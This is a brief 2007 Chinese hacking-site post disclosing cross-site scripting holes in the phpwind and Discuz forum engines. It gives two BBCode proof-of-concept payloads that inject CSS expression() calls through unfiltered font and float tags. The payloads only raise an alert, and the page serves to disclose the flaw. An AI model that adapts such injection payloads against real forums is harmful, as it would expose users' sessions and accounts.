arow 您现在的位置: Yes!黑客联盟 >> 技术 >> 黑客技术 >> 漏洞利用 >> 正文
专题栏目
热门文章
推荐文章
[图文]phpwind、DZ论坛XSS跨站漏洞0DAY           ★★★
phpwind、DZ论坛XSS跨站漏洞0DAY
作者:佚名 文章来源:本站原创 更新时间:2007-6-16 14:50:04 【字体:

lib3rt3同志暴了几个XSS,都是CSS属性相关的.

PW论坛的FONT FACE字体没过滤:

跨站代码:
[font=expression(alert('XSS'))]xss[/font]

DZ论坛的float浮动属性没过滤:

跨站代码:
[float=expression(alert('XSS'))]xss[/float]

实例:


友情提示:如果您对本文章的内容存在疑问请到点此进入论坛进行讨论
文章录入:coldness    责任编辑:coldness 
  • 上一篇文章:

  • 下一篇文章: 没有了
    		•